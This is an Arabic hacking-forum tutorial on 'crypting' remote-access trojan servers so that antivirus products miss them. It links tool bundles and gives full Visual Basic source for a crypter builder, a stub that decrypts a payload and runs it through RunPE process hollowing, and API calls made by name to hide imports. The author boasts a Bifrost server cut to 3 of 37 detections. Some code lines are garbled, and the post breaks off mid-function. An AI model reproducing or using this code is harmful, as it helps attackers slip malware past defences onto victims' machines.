ا
لسلام عليكم

الصلاة و السلام على أشرف المرسليـن
||الحمد لله وحده نحمده و نشكره و نستعينه و نستغفره و نعود بالله من شرور أنفسنا و ||من سيئات أعمالنا
||من يهده الله فلا مظل له و من يظلل فلن تجد له ولياً مرشدا
||و أشهد ألا إلاه إلا الله وحده لا شريك له و أن محمداً عبده و رسوله صلى الله عليه و سلم
||و على آله و صحبه أجمعين و من تبعهم بإحسان إلى يوم الدين
||ربنا لا علم لنا إلا ما علمتنا إنك أنت العليم الخبير
||ربنا لا فهم لنا إلا ما فهمتنا إنك أنت الجواد الكريم
||ربي اشرح لي صدري و يسر لي أمري و احلل عقدة من لساني يفقهوا قولي
أما بعد :

سبحانك اللهم لا علم لنا الا ما علمتنا

زوار واعضاء منتديات جيوش الهكرز الكرام تحيه طيبه بعد:-
بمناسبة تغيير اسم عضويتي من الحياري هكرز الى salte addict hacker
اعددت لكم هده الدورة التي تحتوي علم التشفير

وستكون الشرح حول المفاهيم التاليه في هذا الجدول


بعد وصول التبليغ الخارجي يبدأ المبتديء بالبحث عن السيرفرات المشفره وممكن يلاقي وممكن يبحث وما رح يلاقي اي سيرفر كلين
اذا لقى سيرفر ممكن يكون ملغوم "من اطفال التبليغ"
ان الي تقريبا يومين مشغول وانا احضربدرس كامل مفصل للتشفير بكل انواعه وان شالله تعجبكم
طبعا رح يحتوي الدرس ع دروس فيديو وصور توضيحيه طبعا في بعض
دروس فيديو جلبتها من اعضاء اخرين للافاده وسأذكر الحقوق
بان الله :-

ااولا:- سنبدأ باساسيات التشفيرالسليم :-
1-ما هو التشفير:-
هو تضليل الباتش او السيرفر عن برامج الحماية والانتي فايروس
للتشفير 3 طرق هي:-
1-التشفير السطحي:-
"scan time cryptهو التشفير وبشكل مختصر عند الفحص فقط ولذلك يطبق عليه بالتشفير وقت الفحص"
حين يكون السيرفر شغال في جهاز"بالذاكره"يكون مكشوف وعند الفحص يكون مشفر مع العلم ان تشفيرته ما تدوم اسبوع
وله طرق
نبدأ بالاولى:-
مثل تشفير السيرفر بادوات الهندسه العكسيه
مثل اداة الـ
upx
فهي تضغط او تقلل من حجم السيرفر وهناك العديد من الادوات للهندسه العكسيه ويوجد الكتير من الشرحات عليها
ولكن مش رح اقصر بالشروح المهم هذه الادوات تستعمل للتشفير من مجموعة برامج حماية دفعه واحده
الشرح ادوات الهندسه العكسيه
اولا:- التشفير باداة
fusion
البرامج المستخدمه في الشرح
Fusion
Pe Explorer
LordPe
تم الشرح بواسطة العضو
teto2042

رابط تحميل الشرح

http://www.ziddu.com/download/17122734/Fusion.rar.html
الادوات المستخدمه في الشرح
Fusion
Pe Explorer
LordPe
ثانيا:-
اسطوانة تحتوي على جميع ادوات الهندسه العكسيه
http://www.mediafire.com/?bznw9oe1gi43bpg
وهذه اسطوانه اخرى لشرح جميع برامج الهندسه العكسيه
صوره

التحميل
http://www.mediafire.com/?prubvpiyu4cgeti
رابط اخر

http://www.multiupload.com/Z6POKVL8TP
وهذه الاداة لمن لم تعمل معه الاسطوانه


http://www.mediafire.com/?486bdfaz339g16x

__________________________________________
االان الطريقة الثانيه في التشفير السطحي:-
وهي التشفير بالـ visul basic
انا قسمت التشفير بالفيجوال بيسك الى نوعين\طريقتين لكي اسهل عليكم:-
نبدأ بالنوع الاول وهو بسيط وسهل من التشفير بالفيجوال بيسك :-
اولا هذه التشفير بالرغم من انه سطحي لاكنه مطووول لانه بلغة الفيجوال بيسك كل شي اله اساسيات لنبدأ
هنا كتاب لاساسيات التشفير بالفيجوال بيسك
رابط التحميل

http://www.mediafire.com/?bcayja8bz80j63b
هدا الكتاب مهم بعد الكتاب ننتقل الى التشفير بالفيجوال بيسك
ع بركة الله:-
طبعا التشفير بالفيجوال بيسك مطول ولا يشترط معرفتنا بلغة الفيجوال بيسك
وتخــتلف كــل تشفيــره عن الاخــر , ربمــآ تدعــس 30 حمــآيه هذه المره . وفــي المــره القــآدمه
ربمـــآ تدعــس 20 حمــآيه .. وهــو من نــوع التشفيـــر العشــوائي اي لا يمكــن استهداف حمايه
بعينــها .
الشــرح مفـــصل تفصــيل دقــيق لتــوضيح كــل خطــوه تــم عمــلها
.
طبعا يد وحده ما بتصفق فانا اخدت هدا
ا الشرح من عضو لان التشفير مش مجرد استخدام برامج**^* بالتشفير علم اخر من الصعب اداركه كامل عند شخص معين
الطــريقه مضمــونه مــن حيــث :

1- وصــول التبــليغ .
/ 2- عــدم حــدوث عطــب في السيــرفر .
/ 3- سهــولتها
4- سهــوله استكمــآل التشفــير بالهيكس فــي حالت انكــشف من حمــآيه معــروفه .

طبــعا الشــرح كــآن على سيــرفر بيـفروست .. مكشـوف من جميع الحمايات .. بعد التشفيره صــآرت النتيجه 3/37 حمــآيه ..
.: لتحمــيل الشــرح :.
مــده الشــرح : 29 دقيــقه تقــريبــآ
حجمــه : 222 ميــغا بايت

http://pinterested.co/explosion/s788...D8%AD.rar.html

__________________________________________________ _________
الان ننتقل الى طريقة الثانيه من التشفير بالفيجوال بيسك:-
هده الطريقة مطوله شوي ولاكنها تدعس حمايات بالجمله وهه تعتمد على تصميم برنامج تشفير خاص فيك + ستب خلص فيك:-
اولا ما هو برنامج التشفير:-
هو تطبيق قادر على حماية الملفات التنفيذية لمنع تحليلها أو تنقيحها.

التشفير قادر على حماية الملف الأصلي وترك المراجع بداخل الـ ( Stub ) لتنفيذها عند أول تشغيل لـ ( Stub ) و ثم تقوم هذه المراجع الخاصة بالتنفيذ الأصلي بفك التشفير والبدء في التنفيذ الإعتيادي لها.
ما هو الستب:-
1-هو ملف تنفيذي تم تكوينه بواسطة برنامج التشفير لمعرفة ماهي الملفات التي يجب إعادة صياغة مراجعها وداولها الخاصة
2-خارج برنامج التشفير وقد يكون بداخله أو ملف بيانات مخفي لكن بعد دمجه بملف مشفر يكون على شكل حزمة تنفيذية بداخل الـ الملف التنفيذي
الان ناتي الى تويضح المفاهيم:-
بشكل مختصر :_برنامج التشفير يعتمد في عمله على الستب والستب ممكن ان يكون داخل برنامج التشفير او خارج برنامج التشفير او مخفي
نحن نقوم ببرمجت برنامج تشفير ونحتاج الى:-
سورس كود عمل لطريقة عمل البرنامج 1-
2-نحتاج الى وضع وهو الـ(moudel)
وبعد برمجت برنامج التشفير نحتاج الستب لضبط عمل البرنامج فاما ان يكون الستب مشفر وقوم باخراج السيرفر من برنامج التشفير مشفر
واما ان يكون غير مشفر فينتج سيرفر من برنامج التشفير غير مشفر
فاذا كان الستب غير مشفر نقوم بتشفيره بادوات الهندسه العكسيه التي شرحناها سابقا اونقوم بتشفيره بواسطة برنامج الهكس الي سوف نشرحه لاحقا
انواع برامج التشفير:-
مشفر وفت الفحص
SCAN-TIME Crypter
وفت الفحص هو عندما نفحص ملف بمكافح الفايروسات قبل تشغيله .

إذن إذا تحدثنا عن حماية وقت الفحص قأنه سوف يسمح لنا بتجاوز اكتشاف الملف حتى وقت التشغيل .

.. وهو ما يعرف لدينا في المنتدى بالتشفير السطحي ..

2-مشفر وقت التشغيل:-
RUN-TIME Crypter

وقت التشغيل هو عندما نقوم بتشغيل الملف .
إذن إذا تحدثنا عن حماية وفت التشغيل فهذا يعني ان الملف لا يزال مشفرا حتى في عند تشغيله ويسمح بتخطي مكافح الفايروسات بعد أو قبل تشغيله .

.. وهو التشفير الحقيقي للبيانات وليس سطحيا ..
الان شرح لعمل برنامج تشفير (صور)مع التوضيح وجميعكم تستفيدون باذن الله.
الان نبدأ طبعا البرنامج الي رح نصممه رح يكون تشفير وقت الفحص نبدأ على بركة الله:-
اولا نفتح برنامج الفيجوال بيسك:
-






نُضيف الآتي :

ليصبح الفورم بهذا الشكل :

ثُم نعيد تسمية الأدوات , إلى ما نريد
ليصبح شكل الفورم هكذا :

نضغط عَلى [ Components ]


ونضيف 3 منها في الفورم :

والآن ضَغطتان على زر [ Browse ] لإدخال كود الاستعراض

ونظيف الكود

_____________________________
With CommonDialog1
.Filter = "*.exe | .exe"
.DialogTitle = "Select a File"
.ShowOpen
End With
Text1.Text = CommonDialog1.FileNam

________________________________

في هذا الكود استخدمنا الكلمة المحجوزة [ With ] لاختصار الكتابة
وأمرناه أن يجعل لها عنوان وصيغة افتراضية
ثم أمرناه أن يظهر نافذة فتح الملف
وفي النهاية أنهينا الأمر [ With ]
وثم أمرناه أن يجعل اسم البرنامج ومساره في صندوق النص

نكمل البرنامج :


نقرتان على زر [ Browse ] الثاني
وسنكتب نفس الكود ولكن باختلاف بسيط

-___________________
With CommonDialog2
.Filter = "*.exe | .exe"
.DialogTitle = "Select The Stub"
.ShowOpen
End With
Text2.text = Commondialog2.FileName
______________________
نقرتان على زر [ About ] لإدخال كود " حول "

____________________
MsgBox "This Program was Programmed By :" & _
"salte addict haker" & vbNewLine & "aljyyoush"
______________________
لآن نقرتان على زر [ Exit ] لإدخال كود الخروج ولكن بطريقة مميزة


___________________
Dim quit As Integer
quit = MsgBox ("Are You Sure " & _
"?" , vbQuestion + vbYesNo, "Exit ?")
If quit = vbYes Then End
_________________
في هذا الكود البسيط أعلاه , عرفنا عن متغير من نوع [ Integer ] أي رقم
ثم أعطيناه قيمة وهي رسالة تظهر مفادها هل تريد الخروج ؟
وثم وضعنا كود أنه إذا ضغط زر نعم سيخرج , وإذا ضغط لا لن يخرج

إضاءة :
ألم تلاحظوا أننا لم نكتب End If ؟!
سأجيبكم بأن الجملة الشرطية إذا كانت تحتوي على أمر واحد يمكنك كتابتها على نفس السطر والاستغناء عن [ End If ]

الآن ضغطة على زر [ Crypt ] لكتابة أمر التشفير





|||||||||||||||||||||||||||||||||||||________
With CommonDialog3
.Filter = ".exe*|.exe"
.DialogTitle = "Choose The Save Path"
.ShowSave
End With
Open CommonDialog2.FileName For Binary As #1
Dim po As String, nnc As String
po = Space(LOF(1) - 1)
Get #1, , po
Close #1
Open CommonDialog1.FileName For Binary As 1
nnc = Space(LOF(1) - 1)
Get #1, , nnc
Close #1
If Check1.Value = 1 Then
Dim gx As String
gx = ReadEOFData(CommonDialog1.FileName)
End If
Dim t As New Class1, xo As String
xo = t.EncryptString(nnc, "12345")
Open CommonDialog3.FileName For Binary As #1
Put #1, , po
Put #1, , "123rewr43f"
Put #1, , xo & "123rewr43f" & "123rewr43f" & "123rewr43f" & mensaje
Close #1
If Check1.Value = 1 Then

Call WriteEOFData(CC.FileName, gx)
End If
MsgBox " Finished !!" , vbInformation , "Crypter"
_____________________________________________
شرح الكود ببساطة أن البرنامج سيفتح الستب , ويفرغ معلوماته ويضع معلومات الستب
ومن ثم يتحقق إذا كان خيار [ EOF ] مفعل , إذا كان كذلك , سيقوم بحفظ المعلومات الموجودة في [ EOF ]
وسيقوم بتشفير البيانات بالخوارزمية الموجودة مع البرنامج ويمكنك اختيار واحدة بشرط وضع كود فكها في الستب
ثم يضع البيانات الخاصة ب [ EOF ]
ويعطيك رِسالة بأن التشفير قد انتهى !

نقوم بإضافة موديل :




كود [ EOF ]

_______________________________
Public Function ReadEOFData(sFilePath As String) As String
On Error GoTo Err:
Dim ca As String, leon As String, perro As String
Dim mo As Long, lPos As Long, lPos2 As Long, lCount As Long
If Dir(sFilePath) = "" Then GoTo Err:
mo = FreeFile
Open sFilePath For Binary As #mo
ca = Space(LOF(mo))
Get #mo, , ca
Close #mo
lPos = InStr(1, StrReverse(ca), GetNullBytes(30))
leon = (Mid(StrReverse(ca), 1, lPos - 1))
ReadEOFData = StrReverse(leon)
If ReadEOFData = "" Then
MsgBox "EOF data was not detected!", vbInformation, "Info"
End If
Exit Function
Err:
ReadEOFData = vbNullString
End Function
Sub WriteEOFData(sFilePath As String, sEOFData As String)
Dim ca As String
Dim mo As Long
On Error Resume Next
If Dir(sFilePath) = "" Then Exit Sub
mo = FreeFile
Open sFilePath For Binary As #mo
ca = Space(LOF(mo))
Get #mo, , ca
Close #mo
Kill sFilePath
mo = FreeFile
Open sFilePath For Binary As #mo
Put #mo, , ca & sEOFData
Close #mo
End Sub
Public Function GetNullBytes(lNum) As String
Dim jdx As String
Dim i As Integer
For i = 1 To lNum
jdx = jdx & Chr(0)
Next
GetNullBytes = jdx
End Function
___________________
ببساطة , يقوم هذا الكود باستخراج بيانات السيرفر التي في [ EOF ]
ويقوم بحفظها , ثم في [ Function ] آخر سَيقوم بكتابتها
وبالتحديد عند انتهاء التشفير بالخوارزمية

نَقوم بإضافة كلاس مُوديل [ لخوارزمية DES ]


كود الخوارزيمة

_____________________________
'CryptAPI Encryption/Decryption Class
'------------------------------------
'
'Information concerning the CryptAPI
'encryption/decryption can probably
'be found somewhere on M$ homepage
'http://www.microsoft.com/
'
'(c) 2000, Fredrik Qvarfort
'

Option Explicit

Private m_Key As String

Private Declare Function CryptAcquireContext Lib "advapi32.dll" Alias "CryptAcquireContextA" (ByRef phProv As Long, ByVal pszContainer As String, ByVal pszProvider As String, ByVal dwProvType As Long, ByVal dwFlags As Long) As Long
Private Declare Function CryptCreateHash Lib "advapi32.dll" (ByVal hProv As Long, ByVal Algid As Long, ByVal hKey As Long, ByVal dwFlags As Long, ByRef phHash As Long) As Long
Private Declare Function CryptHashData Lib "advapi32.dll" (ByVal hHash As Long, ByVal pbData As String, ByVal dwDataLen As Long, ByVal dwFlags As Long) As Long
Private Declare Function CryptDeriveKey Lib "advapi32.dll" (ByVal hProv As Long, ByVal Algid As Long, ByVal hBaseData As Long, ByVal dwFlags As Long, ByRef phKey As Long) As Long
Private Declare Function CryptDestroyHash Lib "advapi32.dll" (ByVal hHash As Long) As Long
Private Declare Function CryptEncrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, ByRef pdwDataLen As Long, ByVal dwBufLen As Long) As Long
Private Declare Function CryptDestroyKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function CryptReleaseContext Lib "advapi32.dll" (ByVal hProv As Long, ByVal dwFlags As Long) As Long
Private Declare Function CryptDecrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, ByRef pdwDataLen As Long) As Long

Private Const SERVICE_PROVIDER As String = "Microsoft Base Cryptographic Provider v1.0"
Private Const KEY_CONTAINER As String = "****************llica"
Private Const PROV_RSA_FULL As Long = 1
Private Const CRYPT_NEWKEYSET As Long = 8
Private Const ALG_CLASS_DATA_ENCRYPT As Long = 24576
Private Const ALG_CLASS_HASH As Long = 32768
Private Const ALG_TYPE_ANY As Long = 0
Private Const ALG_TYPE_STREAM As Long = 2048
Private Const ALG_SID_RC4 As Long = 1
Private Const ALG_SID_MD5 As Long = 3
Private Const CALG_MD5 As Long = ((ALG_CLASS_HASH Or ALG_TYPE_ANY) Or ALG_SID_MD5)
Private Const CALG_RC4 As Long = ((ALG_CLASS_DATA_ENCRYPT Or ALG_TYPE_STREAM) Or ALG_SID_RC4)
Private Const ENCRYPT_ALGORITHM As Long = CALG_RC4
Public Sub EncryptByte(ByteArray() As Byte, Optional Password As String)

'Convert the array into a string, encrypt it
'and then convert it back to an array
ByteArray() = StrConv(EncryptString(StrConv(ByteArray(), vbUnicode), Password), vbFromUnicode)

End Sub

Public Function EncryptString(Text As String, Optional Password As String) As String

'Set the new key if any was sent to the function
If (Len(Password) > 0) Then Key = Password

'Return the encrypted data
EncryptString = EncryptDecrypt(Text, True)

End Function

Public Sub DecryptByte(ByteArray() As Byte, Optional Password As String)

'Convert the array into a string, decrypt it
'and then convert it back to an array
ByteArray() = StrConv(DecryptString(StrConv(ByteArray(), vbUnicode), Password), vbFromUnicode)

End Sub


Public Function DecryptString(Text As String, Optional Password As String) As String

'Set the new key if any was sent to the function
If (Len(Password) > 0) Then Key = Password

'Return the decrypted data
DecryptString = EncryptDecrypt(Text, False)

End Function
Public Sub EncryptFile(SourceFile As String, DestFile As String, Optional Key As String)

Dim Filenr As Integer
Dim ByteArray() As Byte

'Make sure the source file do exist
If (Not (SourceFile)) Then
Call Err.Raise(vbObjectError, , "Error in Skipjack EncryptFile procedure (Source file does not exist).")
Exit Sub
End If

'Open the source file and read the content
'into a bytearray to pass onto encryption
Filenr = FreeFile
Open SourceFile For Binary As #Filenr
ReDim ByteArray(0 To LOF(Filenr) - 1)
Get #Filenr, , ByteArray()
Close #Filenr

'Encrypt the bytearray
Call EncryptByte(ByteArray(), Key)

'If the destination file already exist we need
'to delete it since opening it for binary use
'will preserve it if it already exist
If ((DestFile)) Then Kill DestFile

'Store the encrypted data in the destination file
Filenr = FreeFile
Open DestFile For Binary As #Filenr
Put #Filenr, , ByteArray()
Close #Filenr

End Sub


Public Sub DecryptFile(SourceFile As String, DestFile As String, Optional Key As String)

Dim Filenr As Integer
Dim ByteArray() As Byte

'Make sure the source file do exist
If (Not (SourceFile)) Then
Call Err.Raise(vbObjectError, , "Error in Skipjack EncryptFile procedure (Source file does not exist).")
Exit Sub
End If

'Open the source file and read the content
'into a bytearray to decrypt
Filenr = FreeFile
Open SourceFile For Binary As #Filenr
ReDim ByteArray(0 To LOF(Filenr) - 1)
Get #Filenr, , ByteArray()
Close #Filenr

'Decrypt the bytearray
Call DecryptByte(ByteArray(), Key)

'If the destination file already exist we need
'to delete it since opening it for binary use
'will preserve it if it already exist
If ((DestFile)) Then Kill DestFile

'Store the decrypted data in the destination file
Filenr = FreeFile
Open DestFile For Binary As #Filenr
Put #Filenr, , ByteArray()
Close #Filenr

End Sub

Private Function EncryptDecrypt(ByVal Text As String, Encrypt As Boolean) As String

Dim hKey As Long
Dim hHash As Long
Dim lLength As Long
Dim hCryptProv As Long

'Get handle to CSP
If (CryptAcquireContext(hCryptProv, KEY_CONTAINER, SERVICE_PROVIDER, PROV_RSA_FULL, CRYPT_NEWKEYSET) = 0) Then
If (CryptAcquireContext(hCryptProv, KEY_CONTAINER, SERVICE_PROVIDER, PROV_RSA_FULL, 0) = 0) Then
Call Err.Raise(vbObjectError, , "Error during CryptAcquireContext for a new key container." & vbCrLf & "A container with this name probably already exists.")
End If
End If

'Create a hash object to calculate a session
'key from the password (instead of encrypting
'with the actual key)
If (CryptCreateHash(hCryptProv, CALG_MD5, 0, 0, hHash) = 0) Then
Call Err.Raise(vbObjectError, , "Could not create a Hash Object (CryptCreateHash API)")
End If

'Hash the password
If (CryptHashData(hHash, m_Key, Len(m_Key), 0) = 0) Then
Call Err.Raise(vbObjectError, , "Could not calculate a Hash Value (CryptHashData API)")
End If

'Derive a session key from the hash object
If (CryptDeriveKey(hCryptProv, ENCRYPT_ALGORITHM, hHash, 0, hKey) = 0) Then
Call Err.Raise(vbObjectError, , "Could not create a session key (CryptDeriveKey API)")
End If

'Encrypt or decrypt depending on the Encrypt parameter
lLength = Len(Text)
If (Encrypt) Then
If (CryptEncrypt(hKey, 0, 1, 0, Text, lLength, lLength) = 0) Then
Call Err.Raise(vbObjectError, , "Error during CryptEncrypt.")
End If
Else
If (CryptDecrypt(hKey, 0, 1, 0, Text, lLength) = 0) Then
'Call Err.Raise(vbObjectError, , "Error during CryptDecrypt.")
End If
End If

'Return the encrypted/decrypted data
EncryptDecrypt = Left$(Text, lLength)

'Destroy the session key
If (hKey <> 0) Then Call CryptDestroyKey(hKey)

'Destroy the hash object
If (hHash <> 0) Then Call CryptDestroyHash(hHash)

'Release provider handle
If (hCryptProv <> 0) Then Call CryptReleaseContext(hCryptProv, 0)

End Function
Public Property Let Key(New_Value As String)

'Do nothing if no change was made
If (m_Key = New_Value) Then Exit Property

'Set the new key
m_Key = New_Value

End Property
__________+________________+_______
[ DES ] هي خوارزمية تشفير تعتمد على دوال API
وهي قوية نوعاً ما , ويمكنك توليد الخوارزميات باستخدام برنامجي [ Mr.Code Generator ]

وفِي النهاية



وبهذا نكون قد انتهينا من تصميم وبرمجة البرنامج
______________________________________
لستب هو صلب البرنامج
وبدونه لا يوجد برنامج تشفير
ويجب علينا وضع كود الفك لخوارزمية التشفير حتى يعمل الباتش
وإلا ستظهر [ Run Time Error ] ولن يعمل البرنامج ,

نأتي الآن لشرح برمجة الستب


نقوم بحذف الفورم لتوفير المساحة :


نضيف موديل



____________
Dim re As String, nbx() As String, v As String, vb() As Byte

Public Sub Main()
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
re = Space(LOF(1))
Get #1, , re
Close #1
Dim xo As New xd
nbx() = Split(re, "casa")
If nbx(2) = "SI" Then
MsgBox nbx(4), vbInformation, nbx(3)
End If
v = xo.DecryptString(nbx(1), "12345")
vb() = StrConv(v, vbFromUnicode)
Call Dinaurax(App.Path & "\" & App.EXEName & ".exe", vb(), Command)

End Sub
__________________
هذا الكود موجود في زر التشفير

نُضيف موديل آخر




___________
Private Const CONTEXT_FULL As Long = &H10007
Private Const MAX_PATH As Integer = 260
Private Const CREATE_SUSPENDED As Long = &H4
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_RESERVE As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE As Long = &H40

Private Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type


Private Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessID As Long
dwThreadID As Long
End Type

Private Type FLOATING_SAVE_AREA
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type

Private Type CONTEXT
ContextFlags As Long

Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long

FloatSave As FLOATING_SAVE_AREA
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type

Private Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type

Private Type IMAGE_SECTION_HEADER
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
characteristics As Long
End Type

Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
Size As Long
End Type

Private Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
' NT additional fields.
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type



Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
characteristics As Integer
End Type

Private Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Declare Sub RtlMoveMemory Lib "kernel32" (dest As Any, src As Any, ByVal L As Long)
Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long


Public Function CallApiByName(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
Dim xcfdcv(64) As Byte 'enought to hold code + 10 params
Dim i As Long
Dim poxcx As Long
Dim miiuxz As String

xcfdcv(0) = &H58: xcfdcv(1) = &H59: xcfdcv(2) = &H59
xcfdcv(3) = &H59: xcfdcv(4) = &H59: xcfdcv(5) = &H50

poxcx = 6

For i = UBound(Params) To 0 Step -1
xcfdcv(poxcx) = &H68: poxcx = poxcx + 1
miiuxz = (Params(i)): GoSub PutLong: poxcx = poxcx + 4
Next

xcfdcv(poxcx) = &HE8: poxcx = poxcx + 1
miiuxz = GetProcAddress(LoadLibraryA(sLib), sMod) - VarPtr(xcfdcv(poxcx)) - 4
GoSub PutLong: poxcx = poxcx + 4
xcfdcv(poxcx) = &HC3
CallApiByName = CallWindowProcA(VarPtr(xcfdcv(0)), 0, 0, 0, 0)

Exit Function
PutLong:
'This is cheap replacement for RtlMoveMemory/putmem4 (hi/lo word/byte)
miiuxz = Right$(String(8, "0") & Hex(miiuxz), 8)
xcfdcv(poxcx + 0) = ("&h" & Mid$(miiuxz, 7, 2))
xcfdcv(poxcx + 1) = ("&h" & Mid$(miiuxz, 5, 2))
xcfdcv(poxcx + 2) = ("&h" & Mid$(miiuxz, 3, 2))
xcfdcv(poxcx + 3) = ("&h" & Mid$(miiuxz, 1, 2))
Return
End Function
Sub Dinaurax(sHost As String, lpBuffer() As Byte, cmdline As String)
On Error Resume Next
Dim tengounperroqueescoll As IMAGE_DOS_HEADER
Dim tengoquesalirbienestesemestre As IMAGE_NT_HEADERS
Dim tengoquesalirbienenmatematica As IMAGE_SECTION_HEADER
Dim neceistounamejorpc As STARTUPINFO
Dim elconocimientoespoder As PROCESS_INFORMATION
Dim windowsxpesunamierda As CONTEXT
Dim i As Long

neceistounamejorpc.cb = Len(neceistounamejorpc)
windowsxpesunamierda.ContextFlags = CONTEXT_FULL

Call CallApiByName("kernel32", "RtlMoveMemory", VarPtr(tengounperroqueescoll), VarPtr(lpBuffer(0)), Len(tengounperroqueescoll))
Call CallApiByName("kernel32", "RtlMoveMemory", VarPtr(tengoquesalirbienestesemestre), VarPtr(lpBuffer(tengounperroqueescoll.e_lfanew)), Len(tengoquesalirbienestesemestre))
CreateProcessA sHost, " " & cmdline, 0, 0, False, CREATE_SUSPENDED, 0, 0, neceistounamejorpc, elconocimientoespoder

Call CallApiByName("ntdll", "NtUnmapViewOfSection", elconocimientoespoder.hProcess, tengoquesalirbienestesemestre.OptionalHeader.Image Base)
Call CallApiByName("kernel32", "VirtualAllocEx", elconocimientoespoder.hProcess, tengoquesalirbienestesemestre.OptionalHeader.Image Base, tengoquesalirbienestesemestre.OptionalHeader.SizeO fImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
Call CallApiByName("kernel32", "WriteProcessMemory", elconocimientoespoder.hProcess, tengoquesalirbienestesemestre.OptionalHeader.Image Base, VarPtr(lpBuffer(0)), tengoquesalirbienestesemestre.OptionalHeader.SizeO fHeaders, 0)

For i = 0 To tengoquesalirbienestesemestre.FileHeader.NumberOfS ections - 1

RtlMoveMemory tengoquesalirbienenmatematica, lpBuffer(tengounperroqueescoll.e_lfanew + Len(tengoquesalirbienestesemestre) + Len(tengoquesalirbienenmatematica) * i), Len(tengoquesalirbienenmatematica)
Call CallApiByName("kernel32", "WriteProcessMemory", elconocimientoespoder.hProcess, tengoquesalirbienestesemestre.OptionalHeader.Image Base + tengoquesalirbienenmatematica.VirtualAddress, VarPtr(lpBuffer(tengoquesalirbienenmatematica.Poin terToRawData)), tengoquesalirbienenmatematica.SizeOfRawData, 0)

Next

Call CallApiByName("kernel32", "GetThreadContext", elconocimientoespoder.hThread, VarPtr(windowsxpesunamierda))
Call CallApiByName("kernel32", "WriteProcessMemory", elconocimientoespoder.hProcess, windowsxpesunamierda.Ebx + 8, VarPtr(tengoquesalirbienestesemestre.OptionalHeade r.ImageBase), 4, 0)
windowsxpesunamierda.Eax = tengoquesalirbienestesemestre.OptionalHeader.Image Base + tengoquesalirbienestesemestre.OptionalHeader.Addre ssOfEntryPoint
Call CallApiByName("kernel32", "SetThreadContext", elconocimientoespoder.hThread, VarPtr(windowsxpesunamierda))
Call CallApiByName("kernel32", "ResumeThread", elconocimientoespoder.hThread)

End Sub

Public Function Thi***e() As String
Dim gfxxc As Long
Dim dx2cx(255) As Byte
